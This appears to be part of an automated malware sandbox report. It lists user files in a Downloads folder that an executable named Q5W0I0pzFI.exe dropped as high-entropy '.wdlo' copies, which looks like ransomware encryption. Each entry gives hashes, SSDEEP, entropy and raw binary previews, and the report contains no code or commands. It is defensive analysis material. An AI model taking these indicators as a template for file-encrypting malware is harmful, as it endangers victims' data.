.p...o...mQ...u..V...I._O././S>y....[c7......g..+.N.Lk$.O....m.S.....2P.0...\t.A.GbE.....\|Q><77.^....]...... ..R\L...&..7=2...)+.........n...G.@vc....T.Ui..C].6Q.#t'.~...!.H`..

C:\Users\user\Downloads\FENIVHOIKN.xlsx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85592375466774
Encrypted:	false
SSDEEP:	24:EsgDPWnAMAWmEq4dXTiX7nbdNbHbhmgERhgvMeoV1O9GwFBWZZHpo/ONa0dZWFbD:peWnipWDidNbt76DrcGGuZG0dZWVD
MD5:	168DAC412918FBC7974A17C5613A0B29
SHA1:	CF565042208E37D06CB25811F952EAB2FF99BBE6
SHA-256:	DB7591078C2E852655E8CD81F09B12155ABE148CC5BDEFCF56DCF33D5F147C65
SHA-512:	8DCD81A18AE47009B1E1033179ABC8C720233B6A76496BD8DD907D5F4E1FA8A869DBC08D83EB50D950CEE2E7382684DA1DBF4E11095349980FB7123F6AE3FE56
Malicious:	false
Reputation:	unknown
Preview:	FENIV...}.....C..+..$..."$.w..V<0DX..\|#A4..3.z\G.j...}....&.d0.G...ENV.c..CRW..O......". ....E..%C..m4mt,...1...1}p....d..k.......b...[H.....q.....!.(..223c..O..[..yj.^(@.......D.=v.....q...k.hR..FN..6z........y......R;2.....Xx....1......?y.](......G.H. .Yc.-..).IJ...}....1...!y...?..`Oc..8x......`.../}LN!..J.`.Ek.0...j.\|.>...QP3x.gE..._.I#..e$...N..Vz..5..\...X...i...g......3........!..i.M"...'...K.\k7h...H..[s.f5B.....O..r1......+.8.!...cy.`K.>...V.c.i!...l.n..e-..#.Wo.B..,..!..."W}M..................9....u..R&.=2.g...)./s..c....'..k.6.. .......T.w@L.`..Q..(........+.....G.Z....n>.]=.g..9....A...)U..{.C..(...d5Y.7....".G....U'...0>]n..l4D.fq.kJ.d.7..g...=...U....:m..G.m..y}.....+M. .7.b7....!J...@0y.i...Q..?.=.F....S7E...\t$m...._o..,Z..i...l.....K.".#....e.......B.....O../..&...(.VH.......S/R.A.{.I.?.....N..}h..r.....0..5..0.f..\|.U7/.Bf.yJ...B8..([..+..F$.[I..v.g...... .$X(.X.y...r.D..........Q.e.J.V...xe....?...S.\...

C:\Users\user\Downloads\FENIVHOIKN.xlsx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85592375466774
Encrypted:	false
SSDEEP:	24:EsgDPWnAMAWmEq4dXTiX7nbdNbHbhmgERhgvMeoV1O9GwFBWZZHpo/ONa0dZWFbD:peWnipWDidNbt76DrcGGuZG0dZWVD
MD5:	168DAC412918FBC7974A17C5613A0B29
SHA1:	CF565042208E37D06CB25811F952EAB2FF99BBE6
SHA-256:	DB7591078C2E852655E8CD81F09B12155ABE148CC5BDEFCF56DCF33D5F147C65
SHA-512:	8DCD81A18AE47009B1E1033179ABC8C720233B6A76496BD8DD907D5F4E1FA8A869DBC08D83EB50D950CEE2E7382684DA1DBF4E11095349980FB7123F6AE3FE56
Malicious:	false
Reputation:	unknown
Preview:	FENIV...}.....C..+..$..."$.w..V<0DX..\|#A4..3.z\G.j...}....&.d0.G...ENV.c..CRW..O......". ....E..%C..m4mt,...1...1}p....d..k.......b...[H.....q.....!.(..223c..O..[..yj.^(@.......D.=v.....q...k.hR..FN..6z........y......R;2.....Xx....1......?y.](......G.H. .Yc.-..).IJ...}....1...!y...?..`Oc..8x......`.../}LN!..J.`.Ek.0...j.\|.>...QP3x.gE..._.I#..e$...N..Vz..5..\...X...i...g......3........!..i.M"...'...K.\k7h...H..[s.f5B.....O..r1......+.8.!...cy.`K.>...V.c.i!...l.n..e-..#.Wo.B..,..!..."W}M..................9....u..R&.=2.g...)./s..c....'..k.6.. .......T.w@L.`..Q..(........+.....G.Z....n>.]=.g..9....A...)U..{.C..(...d5Y.7....".G....U'...0>]n..l4D.fq.kJ.d.7..g...=...U....:m..G.m..y}.....+M. .7.b7....!J...@0y.i...Q..?.=.F....S7E...\t$m...._o..,Z..i...l.....K.".#....e.......B.....O../..&...(.VH.......S/R.A.{.I.?.....N..}h..r.....0..5..0.f..\|.U7/.Bf.yJ...B8..([..+..F$.[I..v.g...... .$X(.X.y...r.D..........Q.e.J.V...xe....?...S.\...

C:\Users\user\Downloads\NEBFQQYWPS.mp3

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851262211924702
Encrypted:	false
SSDEEP:	24:dEfzlss0plZmHDQngfAdYVdaeN7Z3fOlD4mTq+L0mGj93F+JFvJ/YAYIzuWFbD:dE7lsDBIxNlOuSYmGjh6FZYAnCWVD
MD5:	DA4292D12BFD6F93C61EB91FAC9D4306
SHA1:	88C59D98E205221413F7832223FA1750F1F4D33F
SHA-256:	724666E30F0C9917D82F738F8BE79DD4255396CE0CAEA9A4F6A2F85C16025E4C
SHA-512:	1898817B69F2F2414066AB69EF3988E4EAC38AC8B9A60F326538AF1BF393E108947B518945536A208DE1E0445599C6019B2E5DB4BD894D13E8EFAFA4CB348BD5
Malicious:	false
Reputation:	unknown
Preview:	NEBFQ.....Eqr....u+(.\.#`=...Tq...R=e(j`...}$yq5...$.. Z(.m.]V..9^p...I.^&d.gI.H....x7 j.......ya.....p....1....R........P...j.....0.3.b.@.._....9h...=..:.!Se..A....S+......9&Z.QF.6..- .u..^lm.o.Y($%..S9......<7..$......O.n...3.....&.S....`C6[.I^.:.....V.......&....NZ.'...&..g..Y.mD.I;eeS-N!1...&.J....9&....%.P+...&<.....^.....#.....1...1..c.....C6...G.q\|B.LU.....L...i@f.mq!.Y.@.....9\|ue...M...... .{..0.sr.TJw_..L.v.Wa.#.?MU.\|xC..e..NH.......g.0.p}..TO..+E.Ce2.................h...-..h...y!....(n..{.#v.4...Iu.G.6..0i.z.zk.Y..WT.L../D....D._....."....{....e=../?u^7.>.%..Es.......PCM......H}.,ZO..Y;"..\.v.L..mp..F0.J.v......B..$.z.....b6..6%...).4e.e.....;.%.j...tB......v..e...FVK.2..}.....BAI.gC..J..^.a.Y....Aj7L].....#c....k.l...e......&.'...)..n..5\|...(.w...#_.td...<o[...=..I..<\G6M9.u....n.-P..+Sfz.>.=.Su.C mg..Bl.."p.1Y..?.r.ia....~x.+..F."......~s2..g..^....)~#.Q....X....H.."{..7.Su.R.e(.......l...j.x..b.2H..`.]n.n.~.?.7...Z.b.M..

C:\Users\user\Downloads\NEBFQQYWPS.mp3.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851262211924702
Encrypted:	false
SSDEEP:	24:dEfzlss0plZmHDQngfAdYVdaeN7Z3fOlD4mTq+L0mGj93F+JFvJ/YAYIzuWFbD:dE7lsDBIxNlOuSYmGjh6FZYAnCWVD
MD5:	DA4292D12BFD6F93C61EB91FAC9D4306
SHA1:	88C59D98E205221413F7832223FA1750F1F4D33F
SHA-256:	724666E30F0C9917D82F738F8BE79DD4255396CE0CAEA9A4F6A2F85C16025E4C
SHA-512:	1898817B69F2F2414066AB69EF3988E4EAC38AC8B9A60F326538AF1BF393E108947B518945536A208DE1E0445599C6019B2E5DB4BD894D13E8EFAFA4CB348BD5
Malicious:	false
Reputation:	unknown
Preview:	NEBFQ.....Eqr....u+(.\.#`=...Tq...R=e(j`...}$yq5...$.. Z(.m.]V..9^p...I.^&d.gI.H....x7 j.......ya.....p....1....R........P...j.....0.3.b.@.._....9h...=..:.!Se..A....S+......9&Z.QF.6..- .u..^lm.o.Y($%..S9......<7..$......O.n...3.....&.S....`C6[.I^.:.....V.......&....NZ.'...&..g..Y.mD.I;eeS-N!1...&.J....9&....%.P+...&<.....^.....#.....1...1..c.....C6...G.q\|B.LU.....L...i@f.mq!.Y.@.....9\|ue...M...... .{..0.sr.TJw_..L.v.Wa.#.?MU.\|xC..e..NH.......g.0.p}..TO..+E.Ce2.................h...-..h...y!....(n..{.#v.4...Iu.G.6..0i.z.zk.Y..WT.L../D....D._....."....{....e=../?u^7.>.%..Es.......PCM......H}.,ZO..Y;"..\.v.L..mp..F0.J.v......B..$.z.....b6..6%...).4e.e.....;.%.j...tB......v..e...FVK.2..}.....BAI.gC..J..^.a.Y....Aj7L].....#c....k.l...e......&.'...)..n..5\|...(.w...#_.td...<o[...=..I..<\G6M9.u....n.-P..+Sfz.>.=.Su.C mg..Bl.."p.1Y..?.r.ia....~x.+..F."......~s2..g..^....)~#.Q....X....H.."{..7.Su.R.e(.......l...j.x..b.2H..`.]n.n.~.?.7...Z.b.M..

C:\Users\user\Downloads\RAYHIWGKDI.docx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850541683394903
Encrypted:	false
SSDEEP:	24:rez9roPllg4EbtcYtCwVLsnqDlIhkIbH5DG6EX+oUGY/vsY+IqH/Gxy8WFbD:rez9rWO4Eb1MwVLF5FIbZCap3vmGxy8o
MD5:	6AD0303E8BA865E93DB3289B72FBE711
SHA1:	6E006A300577F97C1A1EF6B3F4169641EB73DE16
SHA-256:	693815C9CA558141DAD0CE303B364FA041668804998E18BEDEC7633F88A8A4E8
SHA-512:	87A73DBF72ACA0347DBC716C0ED09F36BB068CB9CE448B711DA51D6DE022C522BE7730994F929560DB1F8047A2E0955771FB4D5AE28F7EE4E90F8056B3B70878
Malicious:	false
Reputation:	unknown
Preview:	RAYHI}..@.'Z..T9.K.i...L..g.d.E.eP.......G...,.F:.<....^.{P?.F..[.9".9m.....tX...Fi. D.>...S> .K.X..j.B2..4.8.[......AC.6..Y:.Q..J...Ng..)\...}..#./{.#u..k.GV.WC...t%~.5>H]..Bq.>..)........../.(.C....}.<P:..h}.6.vT.9eF.UDx.....&.NVO..q..q..&..M.2.z.N......B...B...h.R.z.)(.#..}:......5.....5i...q...EK&...'...O.KT...`..l....Wlk..t..@}.a....._q...Q...Vs...E..w......P.0BQz..l].v."Z..q.@D....F..........W....7..+.3....C...t...T.<...!6..].SV>,.F>~{.-..'.d........4.:_T....^H..U..cy.9r..'.pL..+...C..`.Y....Rg,.h.^..S6o....N.@..Y.&.>C.I......e.U&..K...!)t.Q.b....S8.G....=...4[..^.;.[.......88....$5.D..Q.30.mA...}.eG.n..?W.i...0.....3.A.m..NpX&6).L..$u.q.Ve.l.Z.D....ELV8t}`9{.Mt..LV.....Q.2..V...o....~....=.e.....#...[..j.v.y....<x-..SX,6..a.@.........a..(........,2.S{v.U...\|fz6.~u%.f.d5.Hz...EV..=...'....&.5.Sl.6i&.>.TD..n,v..B..M..&G.\.{...F{.b8tW....9h..j".b...>p.V..B.'.......Zh.R.....C..U\j......w..Q"...-#..o7.%>W.C..B..1.WB..

C:\Users\user\Downloads\RAYHIWGKDI.docx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850541683394903
Encrypted:	false
SSDEEP:	24:rez9roPllg4EbtcYtCwVLsnqDlIhkIbH5DG6EX+oUGY/vsY+IqH/Gxy8WFbD:rez9rWO4Eb1MwVLF5FIbZCap3vmGxy8o
MD5:	6AD0303E8BA865E93DB3289B72FBE711
SHA1:	6E006A300577F97C1A1EF6B3F4169641EB73DE16
SHA-256:	693815C9CA558141DAD0CE303B364FA041668804998E18BEDEC7633F88A8A4E8
SHA-512:	87A73DBF72ACA0347DBC716C0ED09F36BB068CB9CE448B711DA51D6DE022C522BE7730994F929560DB1F8047A2E0955771FB4D5AE28F7EE4E90F8056B3B70878
Malicious:	false
Reputation:	unknown
Preview:	RAYHI}..@.'Z..T9.K.i...L..g.d.E.eP.......G...,.F:.<....^.{P?.F..[.9".9m.....tX...Fi. D.>...S> .K.X..j.B2..4.8.[......AC.6..Y:.Q..J...Ng..)\...}..#./{.#u..k.GV.WC...t%~.5>H]..Bq.>..)........../.(.C....}.<P:..h}.6.vT.9eF.UDx.....&.NVO..q..q..&..M.2.z.N......B...B...h.R.z.)(.#..}:......5.....5i...q...EK&...'...O.KT...`..l....Wlk..t..@}.a....._q...Q...Vs...E..w......P.0BQz..l].v."Z..q.@D....F..........W....7..+.3....C...t...T.<...!6..].SV>,.F>~{.-..'.d........4.:_T....^H..U..cy.9r..'.pL..+...C..`.Y....Rg,.h.^..S6o....N.@..Y.&.>C.I......e.U&..K...!)t.Q.b....S8.G....=...4[..^.;.[.......88....$5.D..Q.30.mA...}.eG.n..?W.i...0.....3.A.m..NpX&6).L..$u.q.Ve.l.Z.D....ELV8t}`9{.Mt..LV.....Q.2..V...o....~....=.e.....#...[..j.v.y....<x-..SX,6..a.@.........a..(........,2.S{v.U...\|fz6.~u%.f.d5.Hz...EV..=...'....&.5.Sl.6i&.>.TD..n,v..B..M..&G.\.{...F{.b8tW....9h..j".b...>p.V..B.'.......Zh.R.....C..U\j......w..Q"...-#..o7.%>W.C..B..1.WB..

C:\Users\user\Downloads\SFPUSAFIOL.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.827373734600033
Encrypted:	false
SSDEEP:	24:CQ0XhzkubYbkYMmyZr3F4M4wfsMsIOHd4PTo5HshH0f3QJ8uCWFbD:Cn9+SfQKcG05Mef3QJOWVD
MD5:	722E0E23D52B3C07D3E292E8764E3826
SHA1:	D720B23DFB076A3F434613C1EA961A58097EA70C
SHA-256:	B2DE92A336BDB265710D9706DE1350189EDE6C73E45A0988A52FD929B18AD38C
SHA-512:	1290A97235514E8DFB68CBF2217844A836162DB7EAAE61D9775EA4A25B973504A694C9977DF089B3E77A93BA03E288521BFF3026FFFC935B7985EAC44A30FE28
Malicious:	false
Reputation:	unknown
Preview:	SFPUS....Y........=d9f..Q....k}.G$...,o.M..GF..K4......u...\|.d.....~.4...`wa..9V.4+....G...n3.}.......N.......<f(.6...R....._..6V.e%.CC...."..r\|.=bY~.v.O.6OHW<.p....!......FS..D.w.#j........"...v3..4...q....uV..c..rCB..c.....=..0..v7.Z.....1.. ..N.649t.d'....../.._.L.L0A.-(5.....x.g]9...._..p1@t.(b..'..zR..g.....\|...#. W.k..O.h.I<&.H...1w..;..,.....N..6.j..hS#-..E.:..GtI.Z-d{...]E.D..EX..Z+.O.x..$~..S...v..-....T[.gU...<b..:.n...Z....C!.K.L.....2..s...o.}....$.V..:r...H2...f.........Z)...ux..OV..E..Q...e..G7_\!%...6L.D...t....5.J...]E6:.6z...{....X...1....^v..W(h.....Z.<.R..E......b...X..u..+.(.1..9L.LE......a.....7.d=......@.c....f.; 9...]...a.$i.....t...$.L................&.P..E..i..-..=.R>ug.....L.O.jV.[6....S?q;0%a5%.dy..,HY\|S..'.[...G....`\|.I...Ro!..+#'X./..c9u.o.h..(G.&...5DgAy.=B._.^.......eo.._..?..+.D.L.[...{J.t.......S....d.....V#E<Z.=$t. y..c.jI..O..H..9o<...k..A.f]....YF..e./4.r@\.\|>.=.Mz(C...Q.L...5..$... .lv.q.4..j.Q.-..

C:\Users\user\Downloads\SFPUSAFIOL.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.827373734600033
Encrypted:	false
SSDEEP:	24:CQ0XhzkubYbkYMmyZr3F4M4wfsMsIOHd4PTo5HshH0f3QJ8uCWFbD:Cn9+SfQKcG05Mef3QJOWVD
MD5:	722E0E23D52B3C07D3E292E8764E3826
SHA1:	D720B23DFB076A3F434613C1EA961A58097EA70C
SHA-256:	B2DE92A336BDB265710D9706DE1350189EDE6C73E45A0988A52FD929B18AD38C
SHA-512:	1290A97235514E8DFB68CBF2217844A836162DB7EAAE61D9775EA4A25B973504A694C9977DF089B3E77A93BA03E288521BFF3026FFFC935B7985EAC44A30FE28
Malicious:	false
Reputation:	unknown
Preview:	SFPUS....Y........=d9f..Q....k}.G$...,o.M..GF..K4......u...\|.d.....~.4...`wa..9V.4+....G...n3.}.......N.......<f(.6...R....._..6V.e%.CC...."..r\|.=bY~.v.O.6OHW<.p....!......FS..D.w.#j........"...v3..4...q....uV..c..rCB..c.....=..0..v7.Z.....1.. ..N.649t.d'....../.._.L.L0A.-(5.....x.g]9...._..p1@t.(b..'..zR..g.....\|...#. W.k..O.h.I<&.H...1w..;..,.....N..6.j..hS#-..E.:..GtI.Z-d{...]E.D..EX..Z+.O.x..$~..S...v..-....T[.gU...<b..:.n...Z....C!.K.L.....2..s...o.}....$.V..:r...H2...f.........Z)...ux..OV..E..Q...e..G7_\!%...6L.D...t....5.J...]E6:.6z...{....X...1....^v..W(h.....Z.<.R..E......b...X..u..+.(.1..9L.LE......a.....7.d=......@.c....f.; 9...]...a.$i.....t...$.L................&.P..E..i..-..=.R>ug.....L.O.jV.[6....S?q;0%a5%.dy..,HY\|S..'.[...G....`\|.I...Ro!..+#'X./..c9u.o.h..(G.&...5DgAy.=B._.^.......eo.._..?..+.D.L.[...{J.t.......S....d.....V#E<Z.=$t. y..c.jI..O..H..9o<...k..A.f]....YF..e./4.r@\.\|>.=.Mz(C...Q.L...5..$... .lv.q.4..j.Q.-..

C:\Users\user\Downloads\UOOJJOZIRH.jpg

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.828397977386744
Encrypted:	false
SSDEEP:	24:21v3wy7EALAEzOGqh0w/HdHegciEmXEFl3ZqstuPKZu3zaHUORazXaQj4sWFbD:21/wwEUzOf0Y9HKSUFl8euPKZu3zWZYe
MD5:	84DE7C8567B51BFA48686378828E7CF7
SHA1:	E8122B32DD02C25932752A1A90291E6AC3D30857
SHA-256:	64857B3D8353FAE5DED64988BB7BD399BFD6F58F29E41107BD13EAB8449A0D8F
SHA-512:	04665A5E94F64208FCFE8E47597CE6C02369F609989000FD9FC07CBF1649C493BCF929183CCC860DB4E20DEEAD264DC615FCB28571F3CF01C45CC8E57FA34E4E
Malicious:	false
Reputation:	unknown
Preview:	UOOJJJQ.Z.L9n9...W>.-....2.y...]7K..ne...2.\......T.W....\|...+.Db]....?/.z.8.A..04;..fz.X.j.v..F..j....UK...p.............~."...;^..~......H<{......<...L.x<L.VE.A...y.; ..JTr.f.z.^,X.L...,....9.D....q..".\....s..F.j....B..X..r.t.v~x..,.....f..<SS......S..]../>.k.0.(..J.>[..l.L...0...6 ..R...NH..#+S...BC.eo..K..z....H..C5.0."..[.........~.$8.c2..r.R...t;f..aX....d........_.3?+...,.'G......8..c..K..@.(........P.m[.#.\|.....}.0....@.$....s..8.C.DF........`..r...t.o.J..[...luZ6OHEZ.N.._f;s..(n.{+.N9...4..w(!\|......S....I<...x.Mr.;r...}..p.^I.T.E.c..[.........O\./........6M3.6......S2.%.k.'5...]%......jy`...C...=L.-..J..N.yW.rz..T.'.P...WS..'f......4.J?.....b..4..An?_.7.....6_fL>3^Ge.\|.Q..Wq.....u.q.;...I.$.......J$#.....w.k.Cba...AD.9N.%R.....+....?..;G....T..p@....IH.b.(...o..8.0..u...*........P.J...<..n..%..m...2.s.?............`...z.....6`...0...<...`U.."...@/..>W_.!....1O:..g.Ioth..0<.~=.....?...Kh....`.......n..>.......8..@..N87...

C:\Users\user\Downloads\UOOJJOZIRH.jpg.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.828397977386744
Encrypted:	false
SSDEEP:	24:21v3wy7EALAEzOGqh0w/HdHegciEmXEFl3ZqstuPKZu3zaHUORazXaQj4sWFbD:21/wwEUzOf0Y9HKSUFl8euPKZu3zWZYe
MD5:	84DE7C8567B51BFA48686378828E7CF7
SHA1:	E8122B32DD02C25932752A1A90291E6AC3D30857
SHA-256:	64857B3D8353FAE5DED64988BB7BD399BFD6F58F29E41107BD13EAB8449A0D8F
SHA-512:	04665A5E94F64208FCFE8E47597CE6C02369F609989000FD9FC07CBF1649C493BCF929183CCC860DB4E20DEEAD264DC615FCB28571F3CF01C45CC8E57FA34E4E
Malicious:	false
Reputation:	unknown
Preview:	UOOJJJQ.Z.L9n9...W>.-....2.y...]7K..ne...2.\......T.W....\|...+.Db]....?/.z.8.A..04;..fz.X.j.v..F..j....UK...p.............~."...;^..~......H<{......<...L.x<L.VE.A...y.; ..JTr.f.z.^,X.L...,....9.D....q..".\....s..F.j....B..X..r.t.v~x..,.....f..<SS......S..]../>.k.0.(..J.>[..l.L...0...6 ..R...NH..#+S...BC.eo..K..z....H..C5.0."..[.........~.$8.c2..r.R...t;f..aX....d........_.3?+...,.'G......8..c..K..@.(........P.m[.#.\|.....}.0....@.$....s..8.C.DF........`..r...t.o.J..[...luZ6OHEZ.N.._f;s..(n.{+.N9...4..w(!\|......S....I<...x.Mr.;r...}..p.^I.T.E.c..[.........O\./........6M3.6......S2.%.k.'5...]%......jy`...C...=L.-..J..N.yW.rz..T.'.P...WS..'f......4.J?.....b..4..An?_.7.....6_fL>3^Ge.\|.Q..Wq.....u.q.;...I.$.......J$#.....w.k.Cba...AD.9N.%R.....+....?..;G....T..p@....IH.b.(...o..8.0..u...*........P.J...<..n..%..m...2.s.?............`...z.....6`...0...<...`U.."...@/..>W_.!....1O:..g.Ioth..0<.~=.....?...Kh....`.......n..>.......8..@..N87...

C:\Users\user\Downloads\VAMYDFPUND.mp3

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.875286848523873
Encrypted:	false
SSDEEP:	24:+lxA3AgkF3j+IxjxYn0qtA3MTRXuJ+DA93c3Bdy0xM7pqFd7fhgNewCeWFbD:+lxAwpVJxjen0YA3MTRND28Bs8MQFdzV
MD5:	60C9B690D16C2418A52F30A056B8BF48
SHA1:	F5FFA9CE2941F6A5404267E41A67246192AAE3A7
SHA-256:	B2C82577672217C7D8AD07A2FB12AE6029743BFD46FA941EB56385E97609374C
SHA-512:	4F6E3D937BD0AED11BB056D2EDD62EF03F4E30F49B9350BCFCEF67F30CC2429F8CD29BF981C8B9A6A119C6AE32502899BF00ABC149FDEFF250A0BC5B9BC9EE16
Malicious:	false
Reputation:	unknown
Preview:	VAMYD^i...B......IL...D.=...WZ..R...:..r.......P...X..p..5....>....? }5.p.D......+v..S.....!..&..8...6..>...t.e7....+HmOU[.?mp.{+M.[.HS2......%...../R.X.m..g...h.........< ..t..m.}...... "...s..._..dN...t.5.S...<n.3N.).GB...y.....a..4.~{..X .f...^.-.I.iH..y..z..?.9p...E...z..$.... .\|.v.....0..O......h...~Un...`..@...k..L?2.I.f4..#!O.p..h...3.!.a`...0n.\|...&...C=GqERj[\|$n......{T@..`.Rw....,.YNjl...Z9.d.d..:....U....I.>&.......dtZ..~.k.1.%..`f..2w........\|~.'.dc...?....k...e.()...........].G.Q(T:.:@..\?............t...m..J:o./n.J.9.G."Z".@=...m%'..V.Y..m..;...T.H..&9..+:!..:A+N../&^.C..q..X[...ObX...'.w.}R,%]Ac.q`Z..{.Z.2.:N....JI@a..{db..X.X....2.&.....L...".......... YW.Z..+...@.5...V;.4.TF..o..U._.<'c,.......Ae7(.....Ol...i....Qy.~.U......^P.K"lr.R..........._.Pl+.~..^#.a.p4#.z~.1.+.. .g...2p.q.J.5?. i.r...r(.(...KB...:.1U...u....d...~...kw#K..G..#z...C`twGJ..F..].......a....,7..)....+....A......7E.....Z....x.t.a..]...7.d

C:\Users\user\Downloads\VAMYDFPUND.mp3.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.875286848523873
Encrypted:	false
SSDEEP:	24:+lxA3AgkF3j+IxjxYn0qtA3MTRXuJ+DA93c3Bdy0xM7pqFd7fhgNewCeWFbD:+lxAwpVJxjen0YA3MTRND28Bs8MQFdzV
MD5:	60C9B690D16C2418A52F30A056B8BF48
SHA1:	F5FFA9CE2941F6A5404267E41A67246192AAE3A7
SHA-256:	B2C82577672217C7D8AD07A2FB12AE6029743BFD46FA941EB56385E97609374C
SHA-512:	4F6E3D937BD0AED11BB056D2EDD62EF03F4E30F49B9350BCFCEF67F30CC2429F8CD29BF981C8B9A6A119C6AE32502899BF00ABC149FDEFF250A0BC5B9BC9EE16
Malicious:	false
Reputation:	unknown
Preview:	VAMYD^i...B......IL...D.=...WZ..R...:..r.......P...X..p..5....>....? }5.p.D......+v..S.....!..&..8...6..>...t.e7....+HmOU[.?mp.{+M.[.HS2......%...../R.X.m..g...h.........< ..t..m.}...... "...s..._..dN...t.5.S...<n.3N.).GB...y.....a..4.~{..X .f...^.-.I.iH..y..z..?.9p...E...z..$.... .\|.v.....0..O......h...~Un...`..@...k..L?2.I.f4..#!O.p..h...3.!.a`...0n.\|...&...C=GqERj[\|$n......{T@..`.Rw....,.YNjl...Z9.d.d..:....U....I.>&.......dtZ..~.k.1.%..`f..2w........\|~.'.dc...?....k...e.()...........].G.Q(T:.:@..\?............t...m..J:o./n.J.9.G."Z".@=...m%'..V.Y..m..;...T.H..&9..+:!..:A+N../&^.C..q..X[...ObX...'.w.}R,%]Ac.q`Z..{.Z.2.:N....JI@a..{db..X.X....2.&.....L...".......... YW.Z..+...@.5...V;.4.TF..o..U._.<'c,.......Ae7(.....Ol...i....Qy.~.U......^P.K"lr.R..........._.Pl+.~..^#.a.p4#.z~.1.+.. .g...2p.q.J.5?. i.r...r(.(...KB...:.1U...u....d...~...kw#K..G..#z...C`twGJ..F..].......a....,7..)....+....A......7E.....Z....x.t.a..]...7.d

C:\Users\user\Downloads\VAMYDFPUND.pdf

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8618680734081945
Encrypted:	false
SSDEEP:	24:+aik2edH0Vu4GyKHLM8Pz+NaFURWHbV7LmnNnzFDVogsSurEnCdhaL4lQVNiWFbD:IbGUVGyKHleW7VupsgsL8kQVNiWVD
MD5:	03922EC6A63A492D0A23800C7243A353
SHA1:	A6D9313919CCAB702AFD95D34E4535424BE9611B
SHA-256:	15CB891F05C36E1DD19928A0F8AECE7D67A29CFD617FF393C6D5E1B5A5392EC1
SHA-512:	8CDC0530873809195E5201D92D906B32F1638415A2A31BB1051B149004D21DBFDD7828D600C0836916524BD41E6BDC11E1383BF525C375B5DA54470AAE65D458
Malicious:	false
Reputation:	unknown
Preview:	VAMYD..NVj.#.$.S......w.$...!.z......B^...U.[...oM.q...~..&I.c...M..I-.%&.....f..F.<q.p.]Q.X....T;KUV....!...Z.gil.k..F....l?z>]....I]rKg.....E._.}Y...R.....-I.yr....?F..H.S%.....;..o..h..y.....f.B...j..p...l....-....[....zC...o......MP..&..."'.u.#>.e.....5JW...rjP..V..ipy..i...&.~1.F`v.\..Z....._.".X.k.+. o....".z...B..3<Vf...o....2 \|a.....l.{2........g.DJ....n.......j...!}H>.....`...T+..y..n.3...p..#.wT.s.(...w8.d.#.......f..p.r.].`..U7y.]..Bs: .....q..h.n..J.P..Qq.u.Xqdf.....j._..{$6.F....0..9..Nl..cX......Z...'E..d=)7.V..3....H........Dg..m\.s.?.x<.T..KUJ.5....../. D/...6:@I...yk[K..eE0AvW.'n+=.l&i...".t.x.r..).2..0.1.s$.NV....F...E.Zn..5..v...G\|...#..}...i&....;_....v.U..ca..L..b...G.........Q.Y....N.v....V.D##..I..P.o=...H....F..j.$.Z.Z.....#...mK.,.Y..Y..Pk}.D.l.....L........z"c...}.]..m.`O.N....V..@<.N...8.4....3].\..a..O.S>h..&xb^.....D..J.{Ax..`....l....Dey#.&;..O1.....L.\|...[3]^xD...... U.xa.S..U..(....Mlt$...+..."N"G7 .?.L9..t

C:\Users\user\Downloads\VAMYDFPUND.pdf.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8618680734081945
Encrypted:	false
SSDEEP:	24:+aik2edH0Vu4GyKHLM8Pz+NaFURWHbV7LmnNnzFDVogsSurEnCdhaL4lQVNiWFbD:IbGUVGyKHleW7VupsgsL8kQVNiWVD
MD5:	03922EC6A63A492D0A23800C7243A353
SHA1:	A6D9313919CCAB702AFD95D34E4535424BE9611B
SHA-256:	15CB891F05C36E1DD19928A0F8AECE7D67A29CFD617FF393C6D5E1B5A5392EC1
SHA-512:	8CDC0530873809195E5201D92D906B32F1638415A2A31BB1051B149004D21DBFDD7828D600C0836916524BD41E6BDC11E1383BF525C375B5DA54470AAE65D458
Malicious:	false
Reputation:	unknown
